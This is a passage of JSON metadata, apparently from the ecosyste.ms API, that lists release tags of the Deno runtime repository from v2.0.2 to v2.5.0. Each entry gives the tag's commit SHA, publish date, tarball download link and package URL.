d/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denolan